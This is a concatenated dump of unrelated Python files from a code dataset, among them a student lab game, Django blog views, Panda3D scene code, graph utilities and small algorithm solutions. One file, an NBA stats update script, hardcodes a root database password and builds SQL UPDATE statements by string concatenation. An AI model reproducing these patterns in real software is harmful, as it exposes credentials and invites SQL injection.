payment=payment, payment_token=payment_token, amount=amount)\n\n _gateway_postprocess(transaction, payment)\n return transaction\n","sub_path":"remote_works/payment/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":18328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"144432895","text":"# standard_library.py\n\"\"\"Python Essentials: The Standard Library.\nZachary Brown\nMath 321 Lab Section 002\n08/22/2018\n\"\"\"\nimport calculator as calc\nfrom math import sqrt\n\nfrom itertools import combinations as combos\nfrom itertools import chain\n\nimport random as rand\nimport time\nimport sys\nimport box #as box\n\n\n# Problem 1\ndef prob1(L):\n \"\"\"Return the minimum, maximum, and average of the entries of L\n (in that order).\n \"\"\"\n return min(L), max(L), (sum(L)/(1.0*len(L)))\n #raise NotImplementedError(\"Problem 1 Incomplete\")\n\n\n# Problem 2\ndef prob2():\n \"\"\"Determine which Python objects are mutable and which are immutable.\n Test numbers, strings, lists, tuples, and sets. 
Print your results.\n    \"\"\"\n    num1 = 1.5\n    num2 = num1\n    num1 += 1\n    if num1 == num2:\n        print(\"In python3, numbers are mutable.\")\n    else:\n        print(\"In python3, numbers aren't mutable.\")\n\n    str1 = \"hello\"\n    str2 = str1\n    str2 += \" mom\"\n    if str1 == str2:\n        print(\"In python3, strings are mutable.\")\n    else:\n        print(\"In python3, strings aren't mutable.\")\n\n\n    list1 = [1, 2, 3]\n    list2 = list1\n    list2.append(4)\n    if list1 == list2:\n        print(\"In python3, lists are mutable.\")\n    else:\n        print(\"In python3, lists aren't mutable.\")\n\n\n    tup1 = (1, 2, 3)\n    tup2 = tup1\n    tup2 += (1,)\n    if tup1 == tup2:\n        print(\"In python3, tuples are mutable.\")\n    else:\n        print(\"In python3, tuples aren't mutable.\")\n\n\n    set1 = set([1, 2, 3])\n    set2 = set1\n    set2.add(4)\n    if set1 == set2:\n        print(\"In python3, sets are mutable.\")\n    else:\n        print(\"In python3, sets aren't mutable.\")\n\n    #raise NotImplementedError(\"Problem 2 Incomplete\")\n\n\n# Problem 3\ndef hypot(a, b):\n    \"\"\"Calculate and return the length of the hypotenuse of a right triangle.\n    Do not use any functions other than those that are imported from your\n    'calculator' module.\n\n    Parameters:\n        a: the length one of the sides of the triangle.\n        b: the length the other non-hypotenuse side of the triangle.\n    Returns:\n        The length of the triangle's hypotenuse.\n    \"\"\"\n    a_sqr = calc.prod(a, a)\n    b_sqr = calc.prod(b, b)\n    sqr_sum = calc.add(a_sqr, b_sqr)\n    return sqrt(sqr_sum)\n    # raise NotImplementedError(\"Problem 3 Incomplete\")\n\n\n# Problem 4\ndef power_set(A):\n    \"\"\"Use itertools to compute the power set of A.\n\n    Parameters:\n        A (iterable): a str, list, set, tuple, or other iterable collection.\n\n    Returns:\n        (list(sets)): The power set of A as a list of sets.\n    \"\"\"\n    tuple_list = list(chain.from_iterable([list(combos(A, i)) for i in range(0, len(A)+1)]))\n    return [set(item) for item in tuple_list]\n    #raise NotImplementedError(\"Problem 4 Incomplete\")\n\n# Problem 5: Implement shut the box.\ndef main():\n    # usage: python standard_library.py <player_name> <time_limit_seconds>\n    if len(sys.argv) == 3:\n        filename = sys.argv[0]\n        player_name = sys.argv[1]\n        time_lim = float(sys.argv[2])  # measured in seconds\n    else:\n        print(\"Usage: python standard_library.py <player_name> <time_limit>\")\n        return\n\n    time_out = False\n    time_lapsed = 0\n    time_remaining = time_lim\n    total_time_played = 0\n\n    nums_remaining = [1, 2, 3, 4, 5, 6, 7, 8, 9]\n    no_sum_possible = False\n\n    roll_valid = True\n\n    while roll_valid and (len(nums_remaining) > 0) and (not time_out):\n        roll_sum = rand.randint(1, 6)\n        if sum(nums_remaining) > 6:\n            roll_sum += rand.randint(1, 6)\n        roll_valid = box.isvalid(roll_sum, nums_remaining)\n\n        print(\"Numbers remaining: \", nums_remaining)\n        print(\"Roll sum: \", roll_sum)\n\n        if roll_valid:\n            ints_to_eliminate = []\n\n            while (len(ints_to_eliminate) <= 0 and not time_out):\n                start = time.time()\n                player_input = input(\"Enter numbers to eliminate: \")\n                stop = time.time()\n                time_lapsed = stop - start\n                time_remaining = time_remaining - time_lapsed\n                total_time_played += time_lapsed\n\n                if time_remaining <= 0:\n                    time_out = True\n                else:\n                    ints_to_eliminate = box.parse_input(player_input, nums_remaining)\n                    if len(ints_to_eliminate) <= 0:\n                        print(\"Invalid input - your entry must be spaced integers contained in \", nums_remaining, \"! PLEASE TRY AGAIN!\\n\")\n            for num in ints_to_eliminate:\n                if num in nums_remaining:\n                    nums_remaining.remove(num)\n    \n    if time_out:\n        print(\"Time out! Game Over!\")\n    elif not roll_valid:\n        print(\"Invalid roll! 
Game Over!\")\n \n print(\"Score for player \", player_name, \": \", sum(nums_remaining), \" points\")\n print(\"Time played: \", round(total_time_played), \" seconds.\")\n\n if len(nums_remaining) == 0:\n print(\"You WON!!! Congratulations!\")\n elif time_out:\n print(\"You lost SLOW POKE! Try to actually, you know, keep up next time ;)\")\n elif not roll_valid:\n print(\"You lost, but hey, it was just because of a dice roll. Better luck next time!\")\n else:\n print(\"You lost! Better luck next time!\")\n pass\n\nif __name__ == '__main__':\n main()\n","sub_path":"acme_lab2_std_lib_draft/standard_library.py","file_name":"standard_library.py","file_ext":"py","file_size_in_byte":5364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"614319807","text":"\"\"\"\nscript designed to update the season field within regularseason tables\nchanges from '17-'18 to 2018 to make querying and joining easier\n\"\"\"\n\nimport pymysql\nimport logging\nimport datetime\n\ndef find_distinct_seasons(connection):\n select_dates = 'select distinct season from RegularSeasonAverages \\\n union distinct \\\n select distinct season from RegularSeasonTotals \\\n union distinct \\\n select distinct season from RegularSeasonMiscTotals'\n return sql_execute(connection, select_dates)\n\ndef sql_execute(connection, query):\n exe = connection.cursor()\n exe.execute(query)\n return exe.fetchall()\n\ndef parse_dates(dates):\n date_dict = {}\n for date in dates:\n date_dict[date[0]] = date[0][:2]+date[0][-2:]\n return date_dict\n\ndef generate_update_statements(connection, date_dict, table_list):\n exe = connection.cursor()\n for table in table_list:\n for date in date_dict:\n exe.execute(\"update \" + table + \" set season = \" + str(date_dict[date]) + \" where season = '\" + str(date) + \"'\") #'\\\\\" + str(date[:4]) + \"\\\\\" + str(date[4:]) + \"'\")\n return\n\ndef main():\n logging.basicConfig(filename='nba_stat_incrementals_log.log', filemode='a', level=logging.INFO)\n myConnection = pymysql.connect(host=\"localhost\", user=\"root\", password=\"Sk1ttles\", db=\"nba_stats_staging\", autocommit=True)\n table_list = ['regularseasonaverages', 'RegularSeasonTotals', 'RegularSeasonMiscTotals']\n logging.info('Updating ESPN seasons {}'.format(str(datetime.datetime.now())))\n dates = find_distinct_seasons(myConnection)\n date_dict = parse_dates(dates)\n generate_update_statements(myConnection, date_dict, table_list)\n logging.info('ESPN seasons update completed successfully {}'.format(str(datetime.datetime.now())))\n\nif __name__ == '__main__':\n main()\n","sub_path":"Incremental Pipelines/espn_update_season_date.py","file_name":"espn_update_season_date.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"529054005","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on July 2017\n\n@author: JulienWuthrich\n\"\"\"\nfrom setuptools import setup\n\nREQUIREMENTS = [\"numpy\", \"pandas\", \"tqdm\", \"grequests\", \"flask\"]\n\nsetup(\n name='pytools',\n packages=['pytools'],\n version='0.1.0',\n url=\"https://github.com/Jwuthri/PythonTools.git\",\n download_url =\"https://github.com/Jwuthri/PythonTools/archive/0.1.tar.gz\",\n description=\"Some snippets for python\",\n author=\"Julien WUTHRICH\",\n install_requires=REQUIREMENTS,\n license='MIT license',\n keywords=[\"date\", \"time\", \"log\", \"pandas\", \"list\", \"requests\"],\n 
classifiers=[]\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"389147174","text":"\"\"\"\nCopyright 2019 Secure, Reliable, and Intelligent Systems Lab, ETH Zurich\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n http://www.apache.org/licenses/LICENSE-2.0\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n\nimport pprint\nimport argparse\nfrom guidesyn.core.run_model import run_model, run_ablation\nfrom guidesyn.core.arguments import Data, ManualType, DataModeRNN\nimport time\n\n\ndef main():\n start_time = time.time()\n evaluations = [\n (\"MLP\", \"ds\", Data.MANUAL, ManualType.Manual_MLP_OS, DataModeRNN.UNUSED),\n (\"CNN\", \"ds\", Data.IMAGE, ManualType.UNUSED, DataModeRNN.UNUSED),\n (\"RNN\", \"ds\", Data.MANUAL, ManualType.Manual_RNN_OS, DataModeRNN.FULL),\n (\"EnsembleRnnCnn\", \"ds\", Data.BOTH, ManualType.Manual_RNN_OS, DataModeRNN.FULL),\n (\"MLP\", \"dsplus\", Data.MANUAL, ManualType.Manual_MLP_MS, DataModeRNN.UNUSED),\n (\"CNN\", \"dsplus\", Data.IMAGE, ManualType.UNUSED, DataModeRNN.UNUSED),\n (\"RNN\", \"dsplus\", Data.MANUAL, ManualType.Manual_RNN_MS, DataModeRNN.FULL),\n (\"EnsembleRnnCnn\", \"dsplus\", Data.BOTH, ManualType.Manual_RNN_MS, DataModeRNN.FULL)\n ]\n\n parser = argparse.ArgumentParser(description='Experiment specifications')\n parser.add_argument('--gpus', type=str, default=\"-1\", help='GPU to be used')\n parser.add_argument('--model_path', type=str, default=\"./core/saved_modelsPaper/\",\n help='Path to load models from/save to')\n # argparse's type=bool treats any non-empty string (including \"False\") as True, so expose this as a flag\n parser.add_argument('--should_cache', action='store_true', help='Should cache neural net input.')\n args = parser.parse_args()\n gpus = args.gpus.split(\",\")\n return_dict = {}\n\n print(\"Ablation study for {} models \".format(len(evaluations)))\n for i, (model, dataset, dataType, manualType, DataModeRnn) in enumerate(evaluations):\n print(\"{}.) 
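run_ablation.py's --should_cache option illustrates a classic argparse trap: with type=bool, any non-empty string (including "False") parses as True. A short sketch of two safer patterns:

```python
import argparse

parser = argparse.ArgumentParser()

# Pattern 1: a plain on/off switch, False unless the flag is passed.
parser.add_argument('--should_cache', action='store_true',
                    help='Should cache neural net input.')

# Pattern 2: an explicit true/false value, parsed by hand.
def str2bool(value):
    if value.lower() in ('true', '1', 'yes'):
        return True
    if value.lower() in ('false', '0', 'no'):
        return False
    raise argparse.ArgumentTypeError('expected a boolean, got %r' % value)

parser.add_argument('--cache', type=str2bool, default=False,
                    help='Same idea with an explicit value: --cache false')

args = parser.parse_args([])  # empty list: use the defaults
print(args.should_cache, args.cache)  # False False
```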
Ablation study: {} trained on {}\".format(i, model, dataset), flush=True)\n run_model(model, dataset, dataType, manualType, DataModeRnn, \"models-acc\", return_dict, gpus[0], 42,\n run_ablation, False, args.model_path, args.should_cache)\n print(\"\\n----------------------------------------\")\n\n end_time = time.time()\n pp = pprint.PrettyPrinter(indent=4)\n pp.pprint(return_dict)\n print(\"Evaluating ablation dataset took {}, \".format(round(end_time - start_time, 3)))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"guidesyn/run_ablation.py","file_name":"run_ablation.py","file_ext":"py","file_size_in_byte":2733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"422373186","text":"# coding:utf-8\n'''\n@Copyright:LintCode\n@Author: justice_103\n@Problem: http://www.lintcode.com/problem/two-sum\n@Language: Python\n@Datetime: 15-08-05 12:50\n'''\n\nclass Solution:\n \"\"\"\n @param numbers : An array of Integer\n @param target : target = numbers[index1] + numbers[index2]\n @return : [index1 + 1, index2 + 1] (index1 < index2)\n \"\"\"\n def twoSum(self, numbers, target):\n # write your code here\n n=len(numbers)\n \n for i in range(n):\n for j in range(i+1, n):\n if numbers[i]+numbers[j]==target:\n return [i+1,j+1]\n \n return None\n","sub_path":"lintcode/56_two-sum/two-sum.py","file_name":"two-sum.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"271114787","text":"from direct.directbase.DirectStart import *\nfrom direct.actor.Actor import Actor\nfrom pandac.PandaModules import *\nfrom direct.task import Task\nimport math\nfrom math import pi, sin, cos\nfrom direct.showbase.ShowBase import ShowBase\nfrom direct.task import Task\nfrom direct.interval.IntervalGlobal import *\nfrom pandac.PandaModules import Point3\nfrom pandac.PandaModules import *\nfrom panda3d.core import CollisionTraverser,CollisionNode\nfrom panda3d.core import CollisionHandlerQueue,CollisionRay\nfrom panda3d.core import Filename,AmbientLight,DirectionalLight\nfrom panda3d.core import PandaNode,NodePath,Camera,TextNode\nfrom panda3d.core import Vec3,Vec4,BitMask32\nfrom direct.showbase.Transitions import *\nfrom direct.gui.DirectGui import *\nfrom direct.actor.Actor import Actor\nfrom direct.showbase.DirectObject import DirectObject\nfrom direct.filter.CommonFilters import *\nfrom panda3d.ai import *\nimport sys\n\n\nSKY = loader.loadModel('phase_3.5/models/props/TT_sky.bam')\nSKY.reparentTo(render)\nterrain = loader.loadModel('phase_4/models/neighborhoods/toontown_central_full.bam')\nterrain.reparentTo(render)\nterrain.find('**/hill').hide()\n\nMewtastic = Actor({'Torso':'phase_3/models/char/tt_a_chr_dgm_shorts_torso_1000.bam', \\\n 'Legs':'phase_3/models/char/tt_a_chr_dgm_shorts_legs_1000.bam'}, \\\n {'Torso':{'Idle': 'phase_3/models/char/tt_a_chr_dgm_shorts_torso_1000.bam', \\\n 'TorsoAnim':'phase_3/models/char/tt_a_chr_dgm_shorts_torso_neutral.bam'}, \\\n 'Legs':{'Idle':'phase_3/models/char/tt_a_chr_dgm_shorts_legs_1000.bam',\n 'LegsAnim':'phase_3/models/char/tt_a_chr_dgm_shorts_legs_neutral.bam'}})\n \nMewtastic.attach('Torso', 'Legs', 'joint_hips')\n \n#Animations\nMewtastic.loop('TorsoAnim')\nMewtastic.loop('LegsAnim')\n \n#Pos, Hpr, Scale, ReparentTo\nMewtastic.setPos(0, 0, 0)\nMewtastic.setHpr(0, 0, 0)\nMewtastic.setScale(0.90)\nMewtastic.reparentTo(render)\n \n#Head\nHead = 
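The two-sum solution above compares every pair, which is O(n²). A hash-map variant does the same job in one O(n) pass while keeping the same 1-based return convention:

```python
def two_sum_linear(numbers, target):
    """One-pass variant: O(n) time, O(n) space, same 1-based indices."""
    seen = {}  # value -> index where we first saw it
    for j, num in enumerate(numbers):
        complement = target - num
        if complement in seen:
            return [seen[complement] + 1, j + 1]
        seen[num] = j
    return None

assert two_sum_linear([2, 7, 11, 15], 9) == [1, 2]
```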
loader.loadModel('phase_3/models/char/bear-heads-1000.bam')\nHead.find('**/muzzle-short-surprise').hide()\nHead.find('**/muzzle-short-sad').hide()\nHead.find('**/muzzle-short-smile').hide()\nHead.find('**/muzzle-short-neutral').hide()\nHead.find('**/muzzle-short-laugh').hide()\nAngryEyes = loader.loadTexture('lel.jpg')\nHead.find('**/eyes-short').setTexture(AngryEyes, 1)\nHead.find('**/muzzle-long-surprise').hide()\nHead.find('**/muzzle-long-sad').hide()\nHead.find('**/muzzle-long-smile').hide()\nHead.find('**/muzzle-long-angry').hide()\nHead.find('**/muzzle-long-laugh').hide()\nHead.find('**/muzzle-long-neutral').hide()\nHead.find('**/head-long').hide()\nHead.find('**/head-front-long').hide()\nHead.find('**/eyes-long').hide()\nHead.find('**/joint_pupilL_long').hide()\nHead.find('**/joint_pupilR_long').hide()\nHead.find('**/ears-long').hide()\n \nNeck = Mewtastic.find('**/def_head')\nHead.reparentTo(Neck)\n\n#******************************Clothes******************************\n \n \n#Gloves\nGloves = Mewtastic.find('**/hands')\nGloves.setColor(0.99, 0.99, 0.99)\n \n#Sleeves\nSleeves = loader.loadTexture('phase_4/maps/CowboySleeve1.jpg')\nMewtastic.find('**/sleeves').setTexture(Sleeves, 1)\n \n#Shirts\nShirt = loader.loadTexture('phase_4/maps/CowboyShirt1.jpg')\nMewtastic.find('**/torso-top').setTexture(Shirt, 1)\n \n#Shorts\nShorts = loader.loadTexture('phase_4/maps/CowboyShorts1.jpg')\nMewtastic.find('**/torso-bot').setTexture(Shorts, 1)\n \n#Shoes/Boots\nShoes = loader.loadTexture('phase_4/maps/tt_t_chr_avt_acc_sho_converseStyleBlack.jpg')\nMewtastic.find('**/shoes').hide()\nMewtastic.find('**/shoes').hide()\nMewtastic.find('**/boots_long').hide()\nMewtastic.find('**/boots_short').setTexture(Shoes, 1)\nMewtastic.find('**/feet').hide()\n \n#Hats\nHat = loader.loadModel('phase_4/models/accessories/tt_m_chr_avt_acc_hat_pilotsCap.bam')\nHat.reparentTo(Head.find('**/head-short'))\nHat.setPos(0, 0.02, 0.17)\nHat.setHpr(180.00, 333.43, 0)\nHat.setScale(0.43)\n \n#Colors\nHead.find('**/head-short').setColor(0.125, 0.125, 0.125, 1.0)\nHead.find('**/head-front-short').setColor(0.125, 0.125, 0.125, 1.0)\nHead.find('**/ears-short').setColor(0.125, 0.125, 0.125, 1.0)\nMewtastic.find('**/neck').setColor(0.125, 0.125, 0.125, 1.0)\nMewtastic.find('**/arms').setColor(0.125, 0.125, 0.125, 1.0)\nMewtastic.find('**/legs').setColor(0.125, 0.125, 0.125, 1.0)\nMewtastic.find('**/feet').setColor(0.125, 0.125, 0.125, 1.0)\nMewtastic.place()\n\n\n\n#Walk1 = Kart.posInterval (1.00, Point3(0, 0, 3.90))\n#Pace = Sequence(Walk1)\n#Pace.loop()\n\n#Walk1 = Noah.posInterval (1.00, Point3(0, 0, 3.90))\n#Pace = Sequence(Walk1)\n#Pace.loop()\n\n#Walk1 = spin.hprInterval (5.00, Point3(180, 0, 0))\n#Pace = Sequence(Walk1)\n#Pace.loop()\n\n\n\n\nbase.oobe()\nrun()\n\n","sub_path":"projects/old py files/run away.py","file_name":"run away.py","file_ext":"py","file_size_in_byte":4623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"318062019","text":"'''\n\nwritten by Sihyun Jeong (sihyunj@snu.ac.kr)\n\n'''\n \ndef status_comp(lines):\n \n \n wf = open(\"social_status.txt\",\"w\")\n \n indegree = dict()\n outdegree = dict()\n \n for l in lines:\n \n tmp = l.strip('\\n').strip('\\r').split('\\t')\n \n if tmp[1] in indegree.keys():\n indegree[tmp[1]] +=1\n else:\n indegree[tmp[1]] = 1\n\n \n if tmp[0] in outdegree.keys():\n outdegree[tmp[0]] +=1\n else:\n outdegree[tmp[0]] = 1\n \n \n nodes = set(indegree.keys()) | set(outdegree.keys())\n \n statusdict = dict()\n \n for n in 
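The commented-out Walk1/Pace blocks at the end of run away.py hint at Panda3D's interval animation. A sketch of what that pacing loop could look like; the actor argument, distance, and timing are illustrative, not values from the original scene:

```python
# Assumes a running Panda3D scene with an actor already parented to render.
from direct.interval.IntervalGlobal import Sequence
from panda3d.core import Point3

def make_pace(actor, distance=3.90, secs=1.0):
    """Walk the actor out along +Z and back again, looping forever."""
    out = actor.posInterval(secs, Point3(0, 0, distance))
    back = actor.posInterval(secs, Point3(0, 0, 0))
    pace = Sequence(out, back, name="pace")
    pace.loop()
    return pace

# e.g. make_pace(Mewtastic)
```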
nodes:\n \n if n in indegree.keys():\n incnt = indegree[n]\n else:\n incnt = 0\n \n if n in outdegree.keys():\n outcnt = outdegree[n]\n else:\n outcnt = 0\n \n \n #status = float(incnt) / float(outcnt) \n status = float(incnt) / float(incnt+outcnt) #normalized version\n \n # pop with a default instead of del: a node that appears only as a source or\n # only as a target is missing from one of the dicts, and del would raise KeyError\n indegree.pop(n, None)\n outdegree.pop(n, None)\n \n statusdict[n] = status\n \n \n \n wf.write(n)\n wf.write('\\t')\n wf.write(str(status))\n wf.write('\\n')\n \n wf.close()\n return statusdict\n \ndef plp(egonet,statusdict):\n \n \n wf = open(\"plp.txt\",\"w\")\n \n for k in egonet.keys():\n \n \n outdegree=0\n positivelink =0\n \n for (i,j) in egonet[k]:\n if i == k:\n outdegree+=1\n \n if statusdict[i] < statusdict[j]:\n positivelink +=1\n \n if outdegree > 0:\n plp = float(positivelink) / float(outdegree)\n \n wf.write(k)\n wf.write('\\t')\n wf.write(str(plp))\n wf.write('\\n')\n \n wf.close()\n ","sub_path":"socialstatus.py","file_name":"socialstatus.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"157358412","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import HttpResponse\nfrom .models import Post\nfrom django.views.generic import ListView\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin\nfrom django.views.generic import DetailView, UpdateView, DeleteView\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import PostForm\nfrom django.db.models import Q\nfrom django.utils import timezone\n\n\n# Create your views here.\n\ndef home(request):\n posts = Post.objects.all()\n search_query = request.GET.get('q')\n if search_query:\n posts = posts.filter(\n Q(title__icontains = search_query) |\n Q(content__icontains = search_query)\n )\n\n # Top 4 most liked blogs. Once the like-count feature is added, collect the\n # ids of the 4 most liked posts in a list and pass them to these 4 queries. 
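status_comp in socialstatus.py builds its in/out degree tables with manual key checks. A compact sketch of the same bookkeeping with collections.Counter, whose missing keys default to 0:

```python
from collections import Counter

def degree_counts(lines):
    """Same bookkeeping as status_comp, using Counter instead of manual dicts."""
    indegree, outdegree = Counter(), Counter()
    for line in lines:
        src, dst = line.strip().split('\t')[:2]
        outdegree[src] += 1
        indegree[dst] += 1
    nodes = set(indegree) | set(outdegree)
    # Counters return 0 for missing keys, so no existence checks are needed,
    # and every node in `nodes` has indegree + outdegree >= 1.
    return {n: indegree[n] / (indegree[n] + outdegree[n]) for n in nodes}
```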
\n mostliked1 = Post.objects.get(id=6)\n mostliked2 = Post.objects.get(id=5)\n mostliked3 = Post.objects.get(id=4)\n mostliked4 = Post.objects.get(id=3)\n\n context={\n 'posts': posts,\n 'mostliked1':mostliked1,\n 'mostliked2':mostliked2,\n 'mostliked3':mostliked3,\n 'mostliked4':mostliked4,\n }\n return render(request,'blog/home.html', context)\n\n\ndef about(request):\n return render(request,'blog/about.html')\n\n\ndef Profileview(request,name):\n user = get_object_or_404(User, username=name)\n flag = (request.user == user) # Post.author is a model field, not a value; compare against the profile's user\n context={\n 'user':user, 'flag':flag \n }\n if request.user!=user:\n return render(request,'user/profile.html', context)\n else:\n context={\n 'posts': Post.objects.all(),'flag':flag \n }\n return render(request,'user/profile.html',context)\n\n\nclass PostDetailView(DetailView):\n model = Post\n def get_object(self):\n obj = super().get_object()\n obj.view_count += 1\n obj.save()\n return obj\n\n\nclass PostUpdateView(LoginRequiredMixin, UserPassesTestMixin, UpdateView):\n model = Post\n fields = ['title', 'image', 'content']\n\n def form_valid(self, form):\n form.instance.author = self.request.user\n return super().form_valid(form)\n\n def test_func(self):\n post = self.get_object()\n if self.request.user == post.author:\n return True\n return False\n\n\nclass PostDeleteView(LoginRequiredMixin, UserPassesTestMixin, DeleteView):\n model = Post\n success_url = '/'\n\n def test_func(self):\n post = self.get_object()\n if self.request.user == post.author:\n return True\n return False\n\n\n@login_required\ndef post_create(request):\n form = PostForm(request.POST or None, request.FILES or None)\n if form.is_valid():\n instance = form.save(commit=False)\n instance.author_id = request.user.id\n instance.save()\n messages.success(request, \"Successfully Created\")\n return redirect('blog-home')\n context ={\n \"form\": form\n }\n return render(request, \"blog/post_create.html\", context)\n","sub_path":"mysite/blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"610460297","text":"# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution:\n def rangeSumBST(self, root: TreeNode, L: int, R: int) -> int:\n # use a pre-order traversal\n\n limit = [L, R]\n return self.pre_order(root, limit)\n\n def pre_order(self, node: TreeNode, limit) -> int:\n if not node:\n return 0\n else:\n if limit[0] <= node.val <= limit[1]:\n return self.pre_order(node.left, limit) + \\\n node.val + \\\n self.pre_order(node.right, limit)\n elif node.val < limit[0]:\n return self.pre_order(node.right, limit)\n elif node.val > limit[1]:\n return self.pre_order(node.left, limit)\n\n\nif __name__ == '__main__':\n root = TreeNode(10)\n node1 = TreeNode(5)\n node2 = TreeNode(15)\n node3 = TreeNode(3)\n node4 = TreeNode(7)\n node5 = TreeNode(18)\n\n root.left = node1\n root.right = node2\n node1.left = node3\n node1.right = node4\n node2.right = node5\n\n L = 7\n R = 15\n so = Solution()\n res = so.rangeSumBST(root, L, R)\n print(res)\n","sub_path":"leetcode_3/binary_tree_sum.py","file_name":"binary_tree_sum.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"564047733","text":"import numpy as np\nfrom scipy.sparse.csgraph import minimum_spanning_tree\n\ndef create_mst(dist_matrix):\n \"\"\"For a given distance 
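rangeSumBST above prunes subtrees recursively: it skips left children when a node is already below L and right children when it is above R. The same pruning works iteratively with an explicit stack, which avoids recursion-depth limits on skewed trees (using the TreeNode class defined above):

```python
def range_sum_bst_iter(root, L, R):
    """Iterative version of rangeSumBST with the same pruning rules."""
    total, stack = 0, [root]
    while stack:
        node = stack.pop()
        if node is None:
            continue
        if L <= node.val <= R:
            total += node.val
        if node.val > L:   # left subtree can still hold values >= L
            stack.append(node.left)
        if node.val < R:   # right subtree can still hold values <= R
            stack.append(node.right)
    return total
```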
matrix, returns the unit-distance MST.\"\"\"\n # Use toarray because we want a regular nxn matrix, not the scipy sparse matrix.\n # np.random.seed(1)\n mst = minimum_spanning_tree(dist_matrix).toarray()\n # Set every edge weight to 1.\n mst = np.where(mst > 0, 1, 0)\n # Symmetrize.\n mst += mst.T\n mst = mst.astype('float32')\n return mst\n\n\ndef triu_mask(m, k=0):\n \"\"\"\n For a given matrix m, returns a like-sized boolean mask that is true for all\n elements `k` offset from the diagonal.\n \"\"\"\n # plain bool rather than np.bool: the np.bool alias was removed in modern NumPy\n mask = np.zeros_like(m, dtype=bool)\n idx = np.triu_indices_from(m, k=k)\n mask[idx] = True\n return mask\n\n\ndef masked_edges(adj, mask):\n \"\"\"\n For a given adjacency matrix and a like-sized boolean mask, returns a mask\n of the same size that is only true for the unique edges (the upper\n triangle). Assumes a symmetrical adjacency matrix.\n \"\"\"\n return np.logical_and(triu_mask(adj, k=1), mask)\n\n\ndef ordered_edges(distances, mask):\n \"\"\"\n For a given distance matrix and a like-sized mask with `n` true entries,\n returns an n x 2 array of edges sorted by distance, plus the sorted distances.\n \"\"\"\n # We are only interested in the indices where our mask is truthy.\n # On a boolean array nonzero returns the true indices.\n # indices holds a tuple of arrays, one for each dimension.\n indices = np.nonzero(mask)\n ds = distances[indices]\n # argsort returns the sorted indices of the distances.\n # Note: these are not the same as the indices of our mask.\n order = np.argsort(ds)\n # We wish to return a single array, so we use `stack` to combine the two nx1\n # arrays into one nx2 array.\n combined_indices = np.stack(indices, 1)\n # Finally, we reorder our combined indices to be in the same order as the sorted distances.\n return [combined_indices[order].astype('int32'), ds[order]]\n\n\ndef add_unit_edges_to_matrix(adj_m, edges):\n \"\"\"\n For a given adjacency matrix and an nx2 array of edges, returns a new\n adjacency matrix with the edges added. 
The symmetrizing write-back is left commented out below, so only the\n (x, y) direction is set; re-enable the second assignment if a symmetric\n matrix is needed.\n \"\"\"\n new_adj = adj_m.copy()\n for edge in edges:\n x = edge[0]\n y = edge[1]\n new_adj[x][y] = 1\n # new_adj[y][x] = 1\n return new_adj","sub_path":"stad/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":2338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"381944971","text":"from flask import Flask\nfrom flask_restful import Resource, Api\n\n\napp = Flask(__name__)\napi = Api(app)\n\nData = []\n\n\nclass People(Resource):\n def get(self, name):\n global Data\n for x in Data:\n if x['Data'] == name:\n return x\n return {'Data': \"Subbu\"}\n\n def post(self, name):\n tem = {'Data': name}\n global Data\n Data.append(tem)\n return tem\n\n def delete(self, name):\n for ind, x in enumerate(Data):\n if x['Data'] == name:\n tem = Data.pop(ind)\n return {'Note': \"Deleted\"}\n\n\n# the route must declare the parameter the resource methods expect\napi.add_resource(People, '/Name/<string:name>')\n\n\napp.run()\n","sub_path":"ccc.py","file_name":"ccc.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"132577427","text":"# coding=utf-8\n\n\ntotalSegundos = int(input(\"Por favor, entre com o número de segundos que deseja converter: \"))\n\nsegundosRestantes = totalSegundos % 3600\nsegundos = segundosRestantes % 60\nminutos = segundosRestantes // 60\nhoras = (totalSegundos // 3600) % 24\ndias = (totalSegundos // 3600) // 24\n\nprint(dias, \"dias,\", horas, \"horas,\", minutos, \"minutos e\", segundos, \"segundos.\")\n","sub_path":"segunda-semana/lista-exercicios/resolucao-exercicio-3.py","file_name":"resolucao-exercicio-3.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"231187072","text":"import matplotlib.pyplot as 